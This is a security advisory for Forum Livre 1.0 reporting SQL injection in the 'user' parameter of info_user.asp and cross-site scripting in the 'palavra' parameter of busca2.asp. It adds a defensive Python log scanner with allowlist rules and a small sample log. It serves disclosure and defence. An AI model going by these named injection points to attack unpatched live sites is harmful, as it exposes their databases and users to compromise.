vendor: Forum Livre
by: ajann
CVSS: 7.5 (HIGH)
Multiple Remote Vulnerabilities
CWE: 89 (SQL Injection), 79 (XSS)
Product Name: Forum Livre
Affected Version From: Forum Livre 1.0
Affected Version To: Forum Livre 1.0
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Forum Livre 1.0 Multiple Remote Vulnerabilities
The Forum Livre 1.0 application is vulnerable to SQL injection and cross-site scripting (XSS) attacks. The SQL injection vulnerability can be exploited by modifying the 'user' parameter in the 'info_user.asp' page. The XSS vulnerability can be exploited by injecting malicious code into the 'palavra' parameter in the 'busca2.asp' page.
Mitigation:
To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, applying security patches and updates provided by the vendor can help prevent exploitation.
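Because no patch exists, one way to apply the input-validation advice outside the application is to screen web-server logs (or requests at a proxy) against an allowlist for the two affected parameters. The sketch below is an added example, not code from the advisory or from Forum Livre. It assumes that `user` is a numeric account id and that `palavra` is a free-text search term, and it uses a constructed W3C-style log layout (date, time, client IP, method, URI stem, URI query, status).

```python
import re
from urllib.parse import parse_qs

# Allowlist per affected page: (parameter, pattern the whole value must match, CWE).
# Assumptions: 'user' is a numeric id; 'palavra' is plain text without markup
# or SQL metacharacters. Tighten or relax these to match the real application.
RULES = {
    "info_user.asp": ("user", re.compile(r"\d{1,10}"), "CWE-89"),
    "busca2.asp": ("palavra", re.compile(r"[^<>\"'`;()]{0,100}"), "CWE-79"),
}

# Constructed sample log lines (documentation IP range, invented values).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-01-10 10:00:01 192.0.2.10 GET /forum/info_user.asp user=42 200
2007-01-10 10:00:05 192.0.2.11 GET /forum/info_user.asp user=42%27 500
2007-01-10 10:00:09 192.0.2.10 GET /forum/busca2.asp palavra=ajuda+senha 200
2007-01-10 10:00:12 192.0.2.12 GET /forum/busca2.asp palavra=%3Cb%3Eteste 200
2007-01-10 10:00:15 192.0.2.10 GET /forum/default.asp - 200
"""

def check_request(stem, query):
    """Return (page, param, cwe, decoded_value) for each value off the allowlist."""
    page = stem.rsplit("/", 1)[-1].lower()
    rule = RULES.get(page)
    if rule is None:
        return []
    param, allowed, cwe = rule
    # parse_qs percent-decodes, so encoded metacharacters are checked as well.
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    return [(page, param, cwe, v) for v in values if not allowed.fullmatch(v)]

def scan_log(text):
    """Return (client_ip, page, param, cwe, value) for every rejected request."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip header directives and malformed lines
        for hit in check_request(fields[4], fields[5]):
            findings.append((fields[2],) + hit)
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit means the value fell outside the allowlist, not that exploitation succeeded; the durable fix remains parameterized queries and output encoding inside the ASP pages themselves.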